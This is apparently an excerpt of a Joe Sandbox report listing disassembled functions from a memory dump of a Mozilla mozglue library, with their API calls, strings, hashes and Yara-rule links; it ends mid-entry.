Function 6C6B7600 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6C6B7592), ref: 6C6B7608
GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 6C6B7627
FreeLibrary.KERNEL32(?,6C6B7592), ref: 6C6B763C

Strings

ntdll.dll, xrefs: 6C6B7603
NtUnmapViewOfSection, xrefs: 6C6B7621

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: NtUnmapViewOfSection$ntdll.dll
API String ID: 145871493-1050664331
Opcode ID: aff42ef36585dfbf2b3ffed05fcd9c9d21b389548d503c9e2ccb9ff195cd6380
Instruction ID: 4077c0c34e0e82244b259c34acabfe4733f0336438e9aebffaac6e4d6d13d704
Opcode Fuzzy Hash: aff42ef36585dfbf2b3ffed05fcd9c9d21b389548d503c9e2ccb9ff195cd6380
Instruction Fuzzy Hash: 67E0B6B0600342ABDF106FA7E8887817AB8EB5A399F014515EA05D2750EBB1B4119F5E

Function 6C6BBE50 Relevance: 7.7, APIs: 5, Instructions: 163memoryCOMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,?,?,6C6BBE49), ref: 6C6BBEC4
RtlCaptureStackBackTrace.NTDLL ref: 6C6BBEDE
memset.VCRUNTIME140(00000000,00000000,-00000008,?,6C6BBE49), ref: 6C6BBF38
RtlReAllocateHeap.NTDLL ref: 6C6BBF83
RtlFreeHeap.NTDLL(6C6BBE49,00000000), ref: 6C6BBFA6

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Heapmemset$AllocateBackCaptureFreeStackTrace
String ID:
API String ID: 2764315370-0
Opcode ID: aa7aa61b06619e0ee9a99d85cb4b4e8ec3ed49fbb90f089a08a381adfc3eb9a2
Instruction ID: 41be5e43559ec2933148f037eb97a796bf2ada86dae306781c2001eb55ed4b4d
Opcode Fuzzy Hash: aa7aa61b06619e0ee9a99d85cb4b4e8ec3ed49fbb90f089a08a381adfc3eb9a2
Instruction Fuzzy Hash: 62517D71B002058FE714CF69CDC0BAAB7A6FFC9314F294629D516A7B94D730F9168B84

Function 6C6A8E00 Relevance: 7.6, APIs: 6, Instructions: 147COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,?,6C69B58D,?,?,?,?,?,?,?,6C6CD734,?,?,?,6C6CD734), ref: 6C6A8E6E
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C69B58D,?,?,?,?,?,?,?,6C6CD734,?,?,?,6C6CD734), ref: 6C6A8EBF
free.MOZGLUE(?,?,?,?,6C69B58D,?,?,?,?,?,?,?,6C6CD734,?,?,?), ref: 6C6A8F24
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C69B58D,?,?,?,?,?,?,?,6C6CD734,?,?,?,6C6CD734), ref: 6C6A8F46
free.MOZGLUE(?,?,?,?,6C69B58D,?,?,?,?,?,?,?,6C6CD734,?,?,?), ref: 6C6A8F7A
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C69B58D,?,?,?,?,?,?,?,6C6CD734,?,?,?), ref: 6C6A8F8F

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 2d5529b490a9ed527ba4d6f3c07105a9ef5ca3ad7d3b13a1296e15702832f637
Instruction ID: 5c8095c7e4d8c3f82490520348ed4036927259d6491a6e53044fc4a20779ecf9
Opcode Fuzzy Hash: 2d5529b490a9ed527ba4d6f3c07105a9ef5ca3ad7d3b13a1296e15702832f637
Instruction Fuzzy Hash: 8251C2B1A012568FEB10CFA4D88066EB7B2FF4D348F15046AD916AB750E731FD06CB99

Function 6C654DE0 Relevance: 7.6, APIs: 5, Instructions: 133stringCOMMON

Download Yara Rule

APIs

?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C654E5A
?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C654E97
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C654EE9
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C654F02
?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6C654F1E

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
String ID:
API String ID: 713647276-0
Opcode ID: 52175f95d4ea3090ad09e7d1fb6a04a335b1bba66f3e2ef145f8db46a4b08874
Instruction ID: fa9019ae94530c368e15ab28f76c0ca6e05641a3aa38c6ac439540feb09e902e
Opcode Fuzzy Hash: 52175f95d4ea3090ad09e7d1fb6a04a335b1bba66f3e2ef145f8db46a4b08874
Instruction Fuzzy Hash: 8C41F0716087019FC701CF29C8809ABB7E4BF8A344F608A5DF56687640DBB1E935CB85

Function 6C661530 Relevance: 7.6, APIs: 5, Instructions: 98COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(-00000002,?,6C66152B,?,?,?,?,6C661248,?), ref: 6C66159C
memcpy.VCRUNTIME140(00000023,?,?,?,?,6C66152B,?,?,?,?,6C661248,?), ref: 6C6615BC
moz_xmalloc.MOZGLUE(-00000001,?,6C66152B,?,?,?,?,6C661248,?), ref: 6C6615E7
free.MOZGLUE(?,?,?,?,?,?,6C66152B,?,?,?,?,6C661248,?), ref: 6C661606
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6C66152B,?,?,?,?,6C661248,?), ref: 6C661637

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
String ID:
API String ID: 733145618-0
Opcode ID: 60c595e13ce2a9c8a199b3a496b84ba9900cf50bf30422973b7d5e0842e1335b
Instruction ID: d01c86a85d46c23a7c691215a81a34074b03034866677b6b18a6f6f243d40b0c
Opcode Fuzzy Hash: 60c595e13ce2a9c8a199b3a496b84ba9900cf50bf30422973b7d5e0842e1335b
Instruction Fuzzy Hash: 9C31EAB1A001149BCB148E7DD8514AEB7A5FB823647240B2DE423DBFD4EB30D915879B

Function 6C6BAD70 Relevance: 7.6, APIs: 5, Instructions: 93COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000000,?,00000000,?,?,6C6CE330,?,6C67C059), ref: 6C6BAD9D

Part of subcall function 6C66CA10: malloc.MOZGLUE(?), ref: 6C66CA26

memset.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,6C6CE330,?,6C67C059), ref: 6C6BADAC
free.MOZGLUE(?,?,?,?,00000000,?,?,6C6CE330,?,6C67C059), ref: 6C6BAE01
GetLastError.KERNEL32(?,00000000,?,?,6C6CE330,?,6C67C059), ref: 6C6BAE1D
GetLastError.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,?,6C6CE330,?,6C67C059), ref: 6C6BAE3D

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ErrorLast$freemallocmemsetmoz_xmalloc
String ID:
API String ID: 3161513745-0
Opcode ID: 0f21de2af0562fbe7cdfc5f35f1760c945e4117e18b0c4ae4a851e01653c96bd
Instruction ID: 4eb5dd445afc357e947c968c0e77c1b944aa70b059dce956206679de5e0986f5
Opcode Fuzzy Hash: 0f21de2af0562fbe7cdfc5f35f1760c945e4117e18b0c4ae4a851e01653c96bd
Instruction Fuzzy Hash: FB3164B1A002159FDB10DF7A8C44AABB7F8EF49714F15482DE94AE7700E734E815CBA9

Function 6C6B5EF0 Relevance: 7.6, APIs: 5, Instructions: 89COMMON

Download Yara Rule

APIs

?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP140(00000001,00000000,6C6CDCA0,?,?,?,6C68E8B5,00000000), ref: 6C6B5F1F
?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C68E8B5,00000000), ref: 6C6B5F4B
?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(00000000,?,6C68E8B5,00000000), ref: 6C6B5F7B
?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(6E65475B,00000000,?,6C68E8B5,00000000), ref: 6C6B5F9F
?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C68E8B5,00000000), ref: 6C6B5FD6

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@?sbumpc@?$basic_streambuf@?sgetc@?$basic_streambuf@?snextc@?$basic_streambuf@Ipfx@?$basic_istream@
String ID:
API String ID: 1389714915-0
Opcode ID: f8ffd130b540d1622dd6cad74810715579423eb43e2eccc40f7330cdc55ac1c6
Instruction ID: f2c025b6eb9ea565baa2df8d15f82c6db1a81c960568f649629a87da775a8372
Opcode Fuzzy Hash: f8ffd130b540d1622dd6cad74810715579423eb43e2eccc40f7330cdc55ac1c6
Instruction Fuzzy Hash: C23106343006008FD711CF2AC898A6AB7FABF89319F648558E5569BB96CB31EC51CF84

Function 6C65B4C0 Relevance: 7.6, APIs: 5, Instructions: 84COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 6C65B532
moz_xmalloc.MOZGLUE(?), ref: 6C65B55B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C65B56B
wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6C65B57E
free.MOZGLUE(00000000), ref: 6C65B58F

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
String ID:
API String ID: 4244350000-0
Opcode ID: 4d383c59ac1466ad9845e72a84ae01ba623d94f7e40b200926ea7cdfc1fc98de
Instruction ID: 89d8c58b405f94ff87142cdd8ce363126df9faeab29231e2da6d786d2f4b5cda
Opcode Fuzzy Hash: 4d383c59ac1466ad9845e72a84ae01ba623d94f7e40b200926ea7cdfc1fc98de
Instruction Fuzzy Hash: 3D212971A002059BDB00CF69CC80BAEBBB9FF86304F784129E918DB345E736D921C7A5

Function 6C6B6E50 Relevance: 7.6, APIs: 5, Instructions: 72COMMON

Download Yara Rule

APIs

MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6C6B6E78

Part of subcall function 6C6B6A10: InitializeCriticalSection.KERNEL32(6C6DF618), ref: 6C6B6A68
Part of subcall function 6C6B6A10: GetCurrentProcess.KERNEL32 ref: 6C6B6A7D
Part of subcall function 6C6B6A10: GetCurrentProcess.KERNEL32 ref: 6C6B6AA1
Part of subcall function 6C6B6A10: EnterCriticalSection.KERNEL32(6C6DF618), ref: 6C6B6AAE
Part of subcall function 6C6B6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C6B6AE1
Part of subcall function 6C6B6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C6B6B15
Part of subcall function 6C6B6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6C6B6B65
Part of subcall function 6C6B6A10: LeaveCriticalSection.KERNEL32(6C6DF618,?,?), ref: 6C6B6B83

MozFormatCodeAddress.MOZGLUE ref: 6C6B6EC1
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C6B6EE1
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C6B6EED
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000400), ref: 6C6B6EFF

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CriticalSectionstrncpy$AddressCodeCurrentProcess$DescribeEnterFormatInitializeLeave_fileno_writefflush
String ID:
API String ID: 4058739482-0
Opcode ID: 52868295192b0fefc6acc7cb5db6232ecb037373e40537bb9ebe56d2a2dce9ae
Instruction ID: 7a861fe4b3ce47c9d7d0582b0418f171e1b28da3ad38869fc556fbcb7c811e64
Opcode Fuzzy Hash: 52868295192b0fefc6acc7cb5db6232ecb037373e40537bb9ebe56d2a2dce9ae
Instruction Fuzzy Hash: 9F21A471A042199FDF04CF69D8C569E77F9EF89308F044039E809A7241DB70AA59CF96

Function 6C690D60 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6C653DEF), ref: 6C690D71
VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6C653DEF), ref: 6C690D84
VirtualFree.KERNEL32(00000000,00000000,00008000,?,6C653DEF), ref: 6C690DAF

Strings

<jemalloc>, xrefs: 6C690D92, 6C690DB9
: (malloc) Error in VirtualFree(), xrefs: 6C690D97, 6C690DBE

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Virtual$Free$Alloc
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 1852963964-2186867486
Opcode ID: 13bbc51be261d3e61bd704e20e53ec9f8c3ea23577e6d8f8bb17b6e2824cef17
Instruction ID: 9eb333f3b368d62e8b1546ca32396374ec09f74a64d74f8d664fc73b983ace28
Opcode Fuzzy Hash: 13bbc51be261d3e61bd704e20e53ec9f8c3ea23577e6d8f8bb17b6e2824cef17
Instruction Fuzzy Hash: C2F02E3138039623E72016670C0AF6A269EA7C6B35F314035F744DE9C4DA90F80486AE

Function 6C6A7620 Relevance: 7.5, APIs: 5, Instructions: 35threadCOMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(0000002C,?,?,?,?,6C6A75C4,?), ref: 6C6A762B

Part of subcall function 6C66CA10: malloc.MOZGLUE(?), ref: 6C66CA26

InitializeConditionVariable.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,6C6A74D7,6C6B15FC,?,?,?), ref: 6C6A7644
GetCurrentThreadId.KERNEL32 ref: 6C6A765A
AcquireSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C6A74D7,6C6B15FC,?,?,?), ref: 6C6A7663
ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C6A74D7,6C6B15FC,?,?,?), ref: 6C6A7677

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireConditionCurrentInitializeReleaseThreadVariablemallocmoz_xmalloc
String ID:
API String ID: 418114769-0
Opcode ID: ee541756ce323456bcc3d6523245fd4db53dfe164a67086f434006cbe362bdc5
Instruction ID: 6bb646a485ea3ebe2f0a811155d3322491c280c443d3c73ed9b1370723d7e4e5
Opcode Fuzzy Hash: ee541756ce323456bcc3d6523245fd4db53dfe164a67086f434006cbe362bdc5
Instruction Fuzzy Hash: 30F0A471E10786ABD7008F22C888675B778FFEA259F11431AF90543601E7B0B5D18BD5

Function 6C67D468 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 146COMMON

Download Yara Rule

APIs

Part of subcall function 6C68CBE8: GetCurrentProcess.KERNEL32(?,6C6531A7), ref: 6C68CBF1
Part of subcall function 6C68CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6531A7), ref: 6C68CBFA

EnterCriticalSection.KERNEL32(6C6DE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C68D1C5), ref: 6C67D4F2
LeaveCriticalSection.KERNEL32(6C6DE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C68D1C5), ref: 6C67D50B

Part of subcall function 6C65CFE0: EnterCriticalSection.KERNEL32(6C6DE784), ref: 6C65CFF6
Part of subcall function 6C65CFE0: LeaveCriticalSection.KERNEL32(6C6DE784), ref: 6C65D026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C68D1C5), ref: 6C67D52E
EnterCriticalSection.KERNEL32(6C6DE7DC), ref: 6C67D690
LeaveCriticalSection.KERNEL32(6C6DE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C68D1C5), ref: 6C67D751

Strings

MOZ_CRASH(), xrefs: 6C67D4BB

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
String ID: MOZ_CRASH()
API String ID: 3805649505-2608361144
Opcode ID: 4a4597c506335fd374026c37a78a4c4713f739f71224aa12a41bea50c1db6c0a
Instruction ID: 72be7f876658cff6d62bdf5daf5ff4cfa071adc8b61d5b6b6fcdee3ae64f8576
Opcode Fuzzy Hash: 4a4597c506335fd374026c37a78a4c4713f739f71224aa12a41bea50c1db6c0a
Instruction Fuzzy Hash: E651A071A047018FD364CF29C49465AB7F1EF89704F558E2ED59AC7B84D770E840CB6A

Function 6C6A4630 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C6A4721

Strings

., xrefs: 6C6A476A
-%llu, xrefs: 6C6A4733
profiler-paused, xrefs: 6C6A46E4

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: __aulldiv
String ID: -%llu$.$profiler-paused
API String ID: 3732870572-2661126502
Opcode ID: 7c47c857322daacc010ec0f4dd803b779c30a42292451004a68c6c0cc5d1a5bb
Instruction ID: d9b877f844518185a66eb8317f8e241a0f0eb0060e8744db4597b5dc4e61bef9
Opcode Fuzzy Hash: 7c47c857322daacc010ec0f4dd803b779c30a42292451004a68c6c0cc5d1a5bb
Instruction Fuzzy Hash: 37418971E047089BCB08CFB9D88116EBBF5EF86744F10863DE85957B41EB70E841874A

Function 6C6A46E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 115COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C6A4721

Part of subcall function 6C654410: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,6C693EBD,00000017,?,00000000,?,6C693EBD,?,?,6C6542D2), ref: 6C654444

Strings

., xrefs: 6C6A476A
-%llu, xrefs: 6C6A4733
profiler-paused, xrefs: 6C6A46E4

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: __aulldiv__stdio_common_vsprintf
String ID: -%llu$.$profiler-paused
API String ID: 680628322-2661126502
Opcode ID: 26b888f47b694df7ae51fe5d885ae943c1e72917b37d5a576de09379f6fa01ae
Instruction ID: ee623ee0f79995db137349a269ed70c0a4b22cc15c8904805aa0d65b05339753
Opcode Fuzzy Hash: 26b888f47b694df7ae51fe5d885ae943c1e72917b37d5a576de09379f6fa01ae
Instruction Fuzzy Hash: 49312A71F042085BCB08CFADDC812ADBBE6DB89314F55813DE8059BB41EBB0DD058B99

Function 6C6AB410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C654290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C693EBD,6C693EBD,00000000), ref: 6C6542A9

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C6AB127), ref: 6C6AB463
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C6AB4C9
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6C6AB4E4

Strings

pid:, xrefs: 6C6AB4DE

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: _getpidstrlenstrncmptolower
String ID: pid:
API String ID: 1720406129-3403741246
Opcode ID: f2833832c2e09ac9d0fa345bfb691ad62b155d79752d84222e94a571c01022f7
Instruction ID: 08c90ab0690d7f8403227b0f2834ab55f99ceeb46082f2b9e9c56eb2096e64bc
Opcode Fuzzy Hash: f2833832c2e09ac9d0fa345bfb691ad62b155d79752d84222e94a571c01022f7
Instruction Fuzzy Hash: E431E031A0120C9FDB00DFEAD880AEEB7B5FF85318F540529D81267A45D732AD46CBA9

Function 6C69E550 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C69E577
AcquireSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69E584
ReleaseSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69E5DE
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C69E8A6

Strings

